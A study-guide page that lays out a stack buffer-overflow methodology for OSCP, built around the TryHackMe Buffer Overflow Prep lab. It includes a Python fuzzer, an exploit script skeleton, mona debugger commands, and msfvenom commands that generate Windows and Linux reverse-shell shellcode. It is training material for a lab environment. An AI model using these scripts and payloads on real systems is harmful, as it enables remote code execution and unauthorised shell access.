Buffer Overflow Methodology

Buffer Overflow Methodology for OSCP from TryHackMe Buffer Overflow Prep

1. Fuzz application to find number of bytes needed to crash the application

fuzzer.py

import socket, time, sys

ip = "10.10.50.84"
port = 1337
	
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

exploit.py

import socket

ip = "10.10.50.84"
port = 1337

prefix = "OVERFLOW2 " ## optional
eip_offset = 0 
overflow = "A" * eip_offset
retn = ""  ## If retn address == 0x625011af. Set retn address in script == \xaf\x11\x50\x62
padding = "" ## For nop sled
payload= "" ## Shellcode frm msfvenom
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

4. Find bad characters

• Generate byte array in mona: !mona bytearray -b "\x00"

• Compare to find the bad character: !mona compare -f C:\mona\oscp\bytearray.bin -a

5. Find jmp esp instruction sets without any bad characters

Insert bad characters after -cpb flag.

!mona jmp -r esp -cpb "\x00"

6. Generate shellcode

Insert bad characters after -b flag.

• Windows - msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00" -f c

• Linux -

  msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c

7. Set nop sled in padding

"\x90" * 24